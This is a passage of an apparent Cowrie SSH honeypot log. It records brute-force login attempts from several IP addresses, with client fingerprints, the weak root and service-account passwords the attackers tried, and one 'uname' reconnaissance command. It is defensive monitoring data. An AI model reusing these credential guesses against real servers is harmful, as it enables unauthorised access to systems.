v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:40:49.144521Z","src_ip":"185.93.89.7","session":"a9ccbf22a280"}
{"eventid":"cowrie.login.success","username":"root","password":"Index123","message":"login attempt [root/Index123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:40:49.317061Z","src_ip":"185.93.89.7","session":"a9ccbf22a280"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:40:49.343452Z","src_ip":"185.93.89.7","session":"a9ccbf22a280"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":36690,"dst_ip":"1.2.3.4","dst_port":22,"session":"48e751785b3a","protocol":"ssh","message":"New connection: 51.79.164.132:36690 (1.2.3.4:22) [session: 48e751785b3a]","sensor":"my-vps","timestamp":"2025-08-28T08:40:58.423752Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:40:58.750272Z","src_ip":"51.79.164.132","session":"48e751785b3a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:40:58.752532Z","src_ip":"51.79.164.132","session":"48e751785b3a"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"123456","message":"login attempt [mysql/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:41:03.261302Z","src_ip":"51.79.164.132","session":"48e751785b3a"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:41:05.534216Z","src_ip":"51.79.164.132","session":"48e751785b3a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35145,"dst_ip":"1.2.3.4","dst_port":22,"session":"140792c3514b","protocol":"ssh","message":"New connection: 212.227.125.160:35145 (1.2.3.4:22) [session: 140792c3514b]","sensor":"my-vps","timestamp":"2025-08-28T08:41:11.878544Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:41:11.881533Z","src_ip":"212.227.125.160","session":"140792c3514b"}
{"eventid":"cowrie.client.kex","hassh":"b8069e0b946242e63cf891f54883713b","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: b8069e0b946242e63cf891f54883713b","sensor":"my-vps","timestamp":"2025-08-28T08:41:12.052060Z","src_ip":"212.227.125.160","session":"140792c3514b"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:41:12.569291Z","src_ip":"212.227.125.160","session":"140792c3514b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56450,"dst_ip":"1.2.3.4","dst_port":22,"session":"6a57168dd127","protocol":"ssh","message":"New connection: 212.227.125.160:56450 (1.2.3.4:22) [session: 6a57168dd127]","sensor":"my-vps","timestamp":"2025-08-28T08:41:23.514299Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:41:23.905643Z","src_ip":"212.227.125.160","session":"6a57168dd127"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T08:41:23.907211Z","src_ip":"212.227.125.160","session":"6a57168dd127"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":49512,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ed26603e804","protocol":"ssh","message":"New connection: 51.79.164.132:49512 (1.2.3.4:22) [session: 9ed26603e804]","sensor":"my-vps","timestamp":"2025-08-28T08:41:25.756830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:41:26.132137Z","src_ip":"51.79.164.132","session":"9ed26603e804"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:41:26.132937Z","src_ip":"51.79.164.132","session":"9ed26603e804"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48112,"dst_ip":"1.2.3.4","dst_port":22,"session":"41e4d2a7b0a0","protocol":"ssh","message":"New connection: 185.93.89.7:48112 (1.2.3.4:22) [session: 41e4d2a7b0a0]","sensor":"my-vps","timestamp":"2025-08-28T08:41:30.809088Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:41:30.809902Z","src_ip":"185.93.89.7","session":"41e4d2a7b0a0"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:41:30.828095Z","src_ip":"185.93.89.7","session":"41e4d2a7b0a0"}
{"eventid":"cowrie.login.success","username":"root","password":"index123!","message":"login attempt [root/index123!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:41:30.868595Z","src_ip":"185.93.89.7","session":"41e4d2a7b0a0"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssword","message":"login attempt [root/p@ssword] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:41:30.870197Z","src_ip":"51.79.164.132","session":"9ed26603e804"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:41:30.887677Z","src_ip":"185.93.89.7","session":"41e4d2a7b0a0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T08:41:32.895332Z","src_ip":"51.79.164.132","session":"9ed26603e804"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T08:41:32.896023Z","src_ip":"51.79.164.132","session":"9ed26603e804"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:41:34.375909Z","src_ip":"51.79.164.132","session":"9ed26603e804"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:41:34.377362Z","src_ip":"51.79.164.132","session":"9ed26603e804"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":48122,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cf0c5a95be5","protocol":"ssh","message":"New connection: 185.93.89.7:48122 (1.2.3.4:22) [session: 1cf0c5a95be5]","sensor":"my-vps","timestamp":"2025-08-28T08:41:39.991784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:41:39.994650Z","src_ip":"185.93.89.7","session":"1cf0c5a95be5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T08:41:40.010052Z","src_ip":"185.93.89.7","session":"1cf0c5a95be5"}
{"eventid":"cowrie.login.success","username":"root","password":"Index123!","message":"login attempt [root/Index123!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:41:40.065823Z","src_ip":"185.93.89.7","session":"1cf0c5a95be5"}
{"eventid":"cowrie.session.closed","duration":"0.1","message":"Connection lost after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:41:40.086209Z","src_ip":"185.93.89.7","session":"1cf0c5a95be5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41664,"dst_ip":"1.2.3.4","dst_port":22,"session":"6784b4086681","protocol":"ssh","message":"New connection: 212.227.235.229:41664 (1.2.3.4:22) [session: 6784b4086681]","sensor":"my-vps","timestamp":"2025-08-28T08:41:40.313143Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:41:44.835964Z","src_ip":"212.227.235.229","session":"6784b4086681"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T08:41:44.836715Z","src_ip":"212.227.235.229","session":"6784b4086681"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:41:45.746071Z","src_ip":"212.227.235.229","session":"6784b4086681"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:41:45.974576Z","src_ip":"212.227.235.229","session":"6784b4086681"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":41436,"dst_ip":"1.2.3.4","dst_port":22,"session":"191f3e38580c","protocol":"ssh","message":"New connection: 51.79.164.132:41436 (1.2.3.4:22) [session: 191f3e38580c]","sensor":"my-vps","timestamp":"2025-08-28T08:41:53.231377Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:41:53.660257Z","src_ip":"51.79.164.132","session":"191f3e38580c"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T08:41:53.661220Z","src_ip":"51.79.164.132","session":"191f3e38580c"}
{"eventid":"cowrie.login.failed","username":"tom","password":"123456","message":"login attempt [tom/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T08:41:58.687163Z","src_ip":"51.79.164.132","session":"191f3e38580c"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:42:00.714622Z","src_ip":"51.79.164.132","session":"191f3e38580c"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T08:42:01.166189Z","src_ip":"212.227.125.160","session":"6a57168dd127"}
{"eventid":"cowrie.session.closed","duration":"37.8","message":"Connection lost after 37.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T08:42:01.363426Z","src_ip":"212.227.125.160","session":"6a57168dd127"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":42964,"dst_ip":"1.2.3.4","dst_port":22,"session":"761b63ccfe34","protocol":"ssh","message":"New connection: 185.93.89.7:42964 (1.2.3.4:22) [session: 761b63ccfe34]","sensor":"my-vps","timestamp":"2025-08-28T08:42:15.286346Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T08:42:15.288164Z","src_ip":"185.93.89.7","session":"761b63ccfe34"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh